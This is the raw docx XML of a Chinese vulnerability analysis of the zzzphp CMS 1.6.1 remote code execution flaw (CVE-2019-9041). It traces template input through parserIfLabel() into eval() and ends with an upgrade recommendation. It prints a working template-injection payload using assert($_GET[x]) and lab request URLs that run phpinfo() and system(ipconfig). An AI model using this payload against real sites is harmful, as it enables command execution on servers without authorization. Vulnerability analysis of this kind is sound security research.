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2E24" w14:textId="666A870F" w:rsidR="0049271D" w:rsidRPr="00652D7E" w:rsidRDefault="00FB76EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="510" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="1"/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</w:pPr>
      <w:r w:rsidRPr="00FB76EB"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  <w:t>zzzphp CMS 1.6.1 - Remote Code Execution</w:t>
      </w:r>
      <w:r w:rsidR="002A379F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漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641718BB" w14:textId="7BDDFB5B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一、</w:t>
      </w:r>
      <w:r w:rsidR="002A379F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00652D7E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651CAF39" w14:textId="1B2A236B" w:rsidR="0049271D" w:rsidRDefault="00AE2C8B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00652D7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1、</w:t>
      </w:r>
      <w:r w:rsidR="002A379F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00652D7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>简述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9D7A2A" w14:textId="7C2F039C" w:rsidR="004D158C" w:rsidRPr="004D158C" w:rsidRDefault="00A5016B" w:rsidP="006B645E">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A5016B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5016B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>inc/zzz_template.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5016B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>中过滤函数</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5016B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>parserIfLabel()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>错误，导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5016B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>攻击者可以在模板文件中插入动态php代码并导致动态代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155EF061" w14:textId="77777777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二、机理分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76387002" w14:textId="4669837B" w:rsidR="0049271D" w:rsidRPr="00652D7E" w:rsidRDefault="00AE2C8B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00652D7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00652D7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00084A6B" w:rsidRPr="00FB76EB">
        <w:rPr>
          <w:color w:val="373838"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Remote Code Execution</w:t>
      </w:r>
      <w:r w:rsidR="0061241B" w:rsidRPr="00652D7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2DF476" w14:textId="106B5293" w:rsidR="0049271D" w:rsidRPr="00652D7E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影响版本：</w:t>
      </w:r>
      <w:r w:rsidR="001305A0" w:rsidRPr="001305A0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1.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B7690F" w14:textId="132D9221" w:rsidR="0049271D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漏洞编号</w:t>
      </w:r>
      <w:r w:rsidRPr="00652D7E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00A06631" w:rsidRPr="00A06631">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CVE-2019-9041</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39801485" w14:textId="4D5F1F14" w:rsidR="00A03F53" w:rsidRDefault="00201214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在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5016B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>inc/zzz_template.php</w:t>
      </w:r>
      <w:r w:rsidR="00B238A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>文件中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE8E022" w14:textId="4E64D288" w:rsidR="00785221" w:rsidRDefault="00B65488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CED8D91" wp14:editId="37028C8B">
            <wp:extent cx="5274310" cy="26701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8F7E" w14:textId="4B0C7C42" w:rsidR="006A0979" w:rsidRDefault="006A0979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可以看到使用了eval函数，所以代码执行的位置就这里</w:t>
      </w:r>
      <w:r w:rsidR="00C96367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2</w:t>
      </w:r>
      <w:r w:rsidR="00C96367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213</w:t>
      </w:r>
      <w:r w:rsidR="00C96367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行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C73F4C" w14:textId="77777777" w:rsidR="007C2BC7" w:rsidRDefault="00442EAA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lastRenderedPageBreak/>
        <w:t>而2</w:t>
      </w:r>
      <w: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213</w:t>
      </w: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行只有一个传入参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00442EAA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$ifstr</w:t>
      </w:r>
      <w:r w:rsidR="007C2BC7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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A6287A" w14:textId="33CA51B9" w:rsidR="00E71FA9" w:rsidRDefault="00AA2A87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AA2A87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$zcontent</w:t>
      </w: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是文件内容，用户可控</w:t>
      </w:r>
      <w:r w:rsidR="00420C43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。所以实际</w:t>
      </w:r>
      <w:r w:rsidR="007C614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代码执行</w:t>
      </w:r>
      <w:r w:rsidR="00420C43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流程为当</w:t>
      </w:r>
      <w:r w:rsidR="00420C43" w:rsidRPr="00420C4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$zcontent</w:t>
      </w:r>
      <w:r w:rsidR="00420C43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传入</w:t>
      </w:r>
      <w:r w:rsidR="00420C43" w:rsidRPr="00A5016B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>parserIfLabel()</w:t>
      </w:r>
      <w:r w:rsidR="00420C43">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>后经过一系列处理后得到了</w:t>
      </w:r>
      <w:r w:rsidR="00420C43" w:rsidRPr="00442EAA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$ifstr</w:t>
      </w:r>
      <w:r w:rsidR="00E877CA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，然后使用eval（）执行了</w:t>
      </w:r>
      <w:r w:rsidR="00BD0CAA" w:rsidRPr="00442EAA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$ifstr</w:t>
      </w:r>
      <w:r w:rsidR="007C2BC7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，因为</w:t>
      </w:r>
      <w:r w:rsidR="007C2BC7" w:rsidRPr="00AA2A87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$zcontent</w:t>
      </w:r>
      <w:r w:rsidR="007C2BC7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可控，所以</w:t>
      </w:r>
      <w:r w:rsidR="007C2BC7" w:rsidRPr="00442EAA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$ifstr</w:t>
      </w:r>
      <w:r w:rsidR="007C2BC7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可控</w:t>
      </w:r>
      <w:r w:rsidR="00E71FA9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，最终导致</w:t>
      </w:r>
      <w:r w:rsidR="007C614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代码执行</w:t>
      </w:r>
      <w:r w:rsidR="00AA7431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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ADF541" w14:textId="47993E74" w:rsidR="005F0046" w:rsidRDefault="005F0046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CFDBB03" wp14:editId="03141B66">
            <wp:extent cx="5274310" cy="57181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65B7" w14:textId="356BC5A6" w:rsidR="00785221" w:rsidRPr="005F0046" w:rsidRDefault="0073440D" w:rsidP="006B645E">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:color w:val="FF0000"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为方便查看结果，使用seay来调试这段关键代码</w:t>
      </w:r>
      <w:r w:rsidR="005E4D9C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，打印</w:t>
      </w:r>
      <w:r w:rsidR="005E4D9C" w:rsidRPr="005E4D9C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$ifstr</w:t>
      </w:r>
      <w:r w:rsidR="005E4D9C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在传入eval之前的值。</w:t>
      </w:r>
      <w:r w:rsidR="00AA2A87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可以看到</w:t>
      </w:r>
      <w:r w:rsidR="003E6CB1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当</w:t>
      </w:r>
      <w:r w:rsidR="003E6CB1" w:rsidRPr="00AA2A87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$zcontent</w:t>
      </w:r>
      <w:r w:rsidR="003E6CB1" w:rsidRPr="00A60C9A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E6CB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>为下面值的时候</w:t>
      </w:r>
      <w:r w:rsidR="00AA2A87" w:rsidRPr="00413B1D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>{if:assert($_</w:t>
      </w:r>
      <w:r w:rsidR="00AA2A87" w:rsidRPr="00413B1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidR="00AA2A87" w:rsidRPr="00413B1D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[x])}phpinfo();{end if}</w:t>
      </w:r>
      <w:r w:rsidR="00BD0CAA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00BD0CAA" w:rsidRPr="00442EAA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$ifstr</w:t>
      </w:r>
      <w:r w:rsidR="00BD0CAA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的值为</w:t>
      </w:r>
      <w:r w:rsidR="00BD0CAA" w:rsidRPr="00413B1D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>assert($_GET[x])</w:t>
      </w:r>
      <w:r w:rsidR="00614DAC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Arial" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>加上eval就是</w:t>
      </w:r>
      <w:r w:rsidR="002A30B0" w:rsidRPr="00D244F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>eval（</w:t>
      </w:r>
      <w:r w:rsidR="002A30B0" w:rsidRPr="00D244F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>assert($_GET[x])</w:t>
      </w:r>
      <w:r w:rsidR="002A30B0" w:rsidRPr="00D244F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="006567F4" w:rsidRPr="00C92EA0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Arial" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0146688D" w14:textId="3755AF02" w:rsidR="0049271D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三、</w:t>
      </w:r>
      <w:r w:rsidR="00C849EA" w:rsidRPr="00652D7E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>攻击路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D27B7FD" w14:textId="3F806031" w:rsidR="000F53EF" w:rsidRDefault="004A67B6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7166D1D" wp14:editId="6D06F8B6">
            <wp:extent cx="5274310" cy="2439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1E3A" w14:textId="6A9E0544" w:rsidR="004A67B6" w:rsidRPr="00F14C3D" w:rsidRDefault="00A60C9A" w:rsidP="006B645E">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60C9A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{if:assert($_</w:t>
      </w:r>
      <w:r w:rsidR="001C431C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00A60C9A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[x])}phpinfo();{end if}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C300794" w14:textId="322953FC" w:rsidR="004A67B6" w:rsidRDefault="00D31859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687CB0D" wp14:editId="27791ED0">
            <wp:extent cx="5274310" cy="24396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7013" w14:textId="4D0B3C2A" w:rsidR="00AA5236" w:rsidRDefault="00D41A9C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然后访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41A9C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://192.168.2.143/search/?x=phpinfo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F439D65" w14:textId="1D4FAF94" w:rsidR="00936DAD" w:rsidRDefault="00936DAD" w:rsidP="006B645E">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00936DAD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://192.168.2.143/search/?x=system(ipconfig)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430FEF26" w14:textId="5384F8A4" w:rsidR="00D41A9C" w:rsidRPr="00D41A9C" w:rsidRDefault="00D41A9C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可以执行</w:t>
      </w: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代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44758B8D" w14:textId="7118AF1C" w:rsidR="00AA5236" w:rsidRDefault="003E435C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2B3EA" wp14:editId="653FF071">
            <wp:extent cx="5274310" cy="26854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BCEF" w14:textId="19B6D74B" w:rsidR="00C15912" w:rsidRPr="000F53EF" w:rsidRDefault="00EE773B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66E0A60" wp14:editId="21BFFA89">
            <wp:extent cx="5274310" cy="23075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CFD6" w14:textId="53B1706D" w:rsidR="0049271D" w:rsidRPr="00652D7E" w:rsidRDefault="00F338CD" w:rsidP="00F338CD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四</w:t>
      </w:r>
      <w:r w:rsidR="00AE2C8B" w:rsidRPr="00652D7E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>、防御方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B83023" w14:textId="1F80CA0B" w:rsidR="0049271D" w:rsidRPr="00652D7E" w:rsidRDefault="00146E9E" w:rsidP="00F338CD">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156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升级版本</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0049271D" w:rsidRPr="00652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3F041" w14:textId="77777777" w:rsidR="00AF2F70" w:rsidRDefault="00AF2F70" w:rsidP="002C024D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="249BD920" w14:textId="77777777" w:rsidR="00AF2F70" w:rsidRDefault="00AF2F70" w:rsidP="002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77153" w14:textId="77777777" w:rsidR="00AF2F70" w:rsidRDefault="00AF2F70" w:rsidP="002C024D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1D01664D" w14:textId="77777777" w:rsidR="00AF2F70" w:rsidRDefault="00AF2F70" w:rsidP="002C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069"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0256406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86E1A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08386E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3108D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="148310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A56EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53BA6476"/>
    <w:lvl w:ilvl="0" w:tplc="B5A055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13A74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D038A678"/>
    <w:lvl w:ilvl="0" w:tplc="8F86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B862E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B20BD2E"/>
    <w:lvl w:ilvl="0" w:tplc="A7AA98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F6BEC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="421F6BEC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441AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB1C9C16"/>
    <w:lvl w:ilvl="0" w:tplc="FD205CA0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D00F97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DBE8D74A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42"/>
    <w:rsid w:val="00000B51"/>
    <w:rsid w:val="00011F46"/>
    <w:rsid w:val="00013050"/>
    <w:rsid w:val="00024957"/>
    <w:rsid w:val="00025932"/>
    <w:rsid w:val="00031823"/>
    <w:rsid w:val="000324E5"/>
    <w:rsid w:val="000351E6"/>
    <w:rsid w:val="00041373"/>
    <w:rsid w:val="00050A46"/>
    <w:rsid w:val="00050CBF"/>
    <w:rsid w:val="0005424F"/>
    <w:rsid w:val="00054438"/>
    <w:rsid w:val="00062ADF"/>
    <w:rsid w:val="000646D6"/>
    <w:rsid w:val="000675A8"/>
    <w:rsid w:val="0007399C"/>
    <w:rsid w:val="00084A6B"/>
    <w:rsid w:val="00093A19"/>
    <w:rsid w:val="000A0EF2"/>
    <w:rsid w:val="000A4899"/>
    <w:rsid w:val="000B5769"/>
    <w:rsid w:val="000C725F"/>
    <w:rsid w:val="000D3254"/>
    <w:rsid w:val="000D5484"/>
    <w:rsid w:val="000D624D"/>
    <w:rsid w:val="000D6E4E"/>
    <w:rsid w:val="000E4534"/>
    <w:rsid w:val="000F1722"/>
    <w:rsid w:val="000F38D7"/>
    <w:rsid w:val="000F53EF"/>
    <w:rsid w:val="000F7BE0"/>
    <w:rsid w:val="0010293E"/>
    <w:rsid w:val="00116D63"/>
    <w:rsid w:val="00123758"/>
    <w:rsid w:val="00127AFD"/>
    <w:rsid w:val="001304F9"/>
    <w:rsid w:val="001305A0"/>
    <w:rsid w:val="00135F35"/>
    <w:rsid w:val="001419EA"/>
    <w:rsid w:val="00146E9E"/>
    <w:rsid w:val="00157B1F"/>
    <w:rsid w:val="00163B5B"/>
    <w:rsid w:val="001754CB"/>
    <w:rsid w:val="00176243"/>
    <w:rsid w:val="00182046"/>
    <w:rsid w:val="00187E1B"/>
    <w:rsid w:val="00190484"/>
    <w:rsid w:val="00193F64"/>
    <w:rsid w:val="001A6F6C"/>
    <w:rsid w:val="001C431C"/>
    <w:rsid w:val="001D1CB8"/>
    <w:rsid w:val="001D25EF"/>
    <w:rsid w:val="001E078F"/>
    <w:rsid w:val="001F18B8"/>
    <w:rsid w:val="001F4DAA"/>
    <w:rsid w:val="00201214"/>
    <w:rsid w:val="002022F8"/>
    <w:rsid w:val="00203399"/>
    <w:rsid w:val="00211F00"/>
    <w:rsid w:val="0022700D"/>
    <w:rsid w:val="00227224"/>
    <w:rsid w:val="0023642A"/>
    <w:rsid w:val="00247CA0"/>
    <w:rsid w:val="00251F47"/>
    <w:rsid w:val="00271F2E"/>
    <w:rsid w:val="00275D96"/>
    <w:rsid w:val="0029703F"/>
    <w:rsid w:val="002A30B0"/>
    <w:rsid w:val="002A379F"/>
    <w:rsid w:val="002B1999"/>
    <w:rsid w:val="002B3CA7"/>
    <w:rsid w:val="002B7B15"/>
    <w:rsid w:val="002C024D"/>
    <w:rsid w:val="002C23AF"/>
    <w:rsid w:val="002C3715"/>
    <w:rsid w:val="002C7EF6"/>
    <w:rsid w:val="002D2C3B"/>
    <w:rsid w:val="002D7963"/>
    <w:rsid w:val="002F096A"/>
    <w:rsid w:val="002F5D22"/>
    <w:rsid w:val="002F795E"/>
    <w:rsid w:val="003031A5"/>
    <w:rsid w:val="00311C63"/>
    <w:rsid w:val="00326454"/>
    <w:rsid w:val="00326E0D"/>
    <w:rsid w:val="003542EF"/>
    <w:rsid w:val="0035510D"/>
    <w:rsid w:val="00355B8A"/>
    <w:rsid w:val="003611E7"/>
    <w:rsid w:val="00376C4C"/>
    <w:rsid w:val="00377322"/>
    <w:rsid w:val="00381D3B"/>
    <w:rsid w:val="0038221A"/>
    <w:rsid w:val="00396924"/>
    <w:rsid w:val="003B3DEF"/>
    <w:rsid w:val="003E435C"/>
    <w:rsid w:val="003E460E"/>
    <w:rsid w:val="003E6CB1"/>
    <w:rsid w:val="003F3EEB"/>
    <w:rsid w:val="00400B37"/>
    <w:rsid w:val="00403112"/>
    <w:rsid w:val="004073B0"/>
    <w:rsid w:val="00413B1D"/>
    <w:rsid w:val="00414968"/>
    <w:rsid w:val="004201F2"/>
    <w:rsid w:val="00420C43"/>
    <w:rsid w:val="00422A6C"/>
    <w:rsid w:val="004255DD"/>
    <w:rsid w:val="00425F7C"/>
    <w:rsid w:val="00433655"/>
    <w:rsid w:val="00436A69"/>
    <w:rsid w:val="00442EAA"/>
    <w:rsid w:val="004621C9"/>
    <w:rsid w:val="00464956"/>
    <w:rsid w:val="0046657C"/>
    <w:rsid w:val="00466587"/>
    <w:rsid w:val="00475706"/>
    <w:rsid w:val="004775B2"/>
    <w:rsid w:val="0048006F"/>
    <w:rsid w:val="0048052C"/>
    <w:rsid w:val="00480F2F"/>
    <w:rsid w:val="004826C8"/>
    <w:rsid w:val="0048302D"/>
    <w:rsid w:val="00483272"/>
    <w:rsid w:val="00490518"/>
    <w:rsid w:val="004912BB"/>
    <w:rsid w:val="0049271D"/>
    <w:rsid w:val="004952A6"/>
    <w:rsid w:val="004A4B88"/>
    <w:rsid w:val="004A67B6"/>
    <w:rsid w:val="004B121C"/>
    <w:rsid w:val="004B2332"/>
    <w:rsid w:val="004B3F11"/>
    <w:rsid w:val="004C6FD5"/>
    <w:rsid w:val="004C7557"/>
    <w:rsid w:val="004D158C"/>
    <w:rsid w:val="004D4835"/>
    <w:rsid w:val="004D525A"/>
    <w:rsid w:val="004E61E3"/>
    <w:rsid w:val="004F1142"/>
    <w:rsid w:val="004F114E"/>
    <w:rsid w:val="0050335A"/>
    <w:rsid w:val="00504702"/>
    <w:rsid w:val="00512EC2"/>
    <w:rsid w:val="005145C8"/>
    <w:rsid w:val="00520AE1"/>
    <w:rsid w:val="005244EF"/>
    <w:rsid w:val="00527B0E"/>
    <w:rsid w:val="00543C3A"/>
    <w:rsid w:val="00543D47"/>
    <w:rsid w:val="005476C6"/>
    <w:rsid w:val="005517BC"/>
    <w:rsid w:val="00552BF6"/>
    <w:rsid w:val="00562316"/>
    <w:rsid w:val="00572DB5"/>
    <w:rsid w:val="00580496"/>
    <w:rsid w:val="00581284"/>
    <w:rsid w:val="00583C93"/>
    <w:rsid w:val="0058419E"/>
    <w:rsid w:val="005844FC"/>
    <w:rsid w:val="00586D42"/>
    <w:rsid w:val="005A68F3"/>
    <w:rsid w:val="005B677A"/>
    <w:rsid w:val="005C0D13"/>
    <w:rsid w:val="005D79E7"/>
    <w:rsid w:val="005E0340"/>
    <w:rsid w:val="005E4D9C"/>
    <w:rsid w:val="005F0046"/>
    <w:rsid w:val="005F015F"/>
    <w:rsid w:val="005F35E4"/>
    <w:rsid w:val="00600764"/>
    <w:rsid w:val="00601FF8"/>
    <w:rsid w:val="0061241B"/>
    <w:rsid w:val="00614DAC"/>
    <w:rsid w:val="00625665"/>
    <w:rsid w:val="00635D23"/>
    <w:rsid w:val="0063704D"/>
    <w:rsid w:val="0065294B"/>
    <w:rsid w:val="00652D7E"/>
    <w:rsid w:val="006567F4"/>
    <w:rsid w:val="00666F62"/>
    <w:rsid w:val="00681AEA"/>
    <w:rsid w:val="00687841"/>
    <w:rsid w:val="00696553"/>
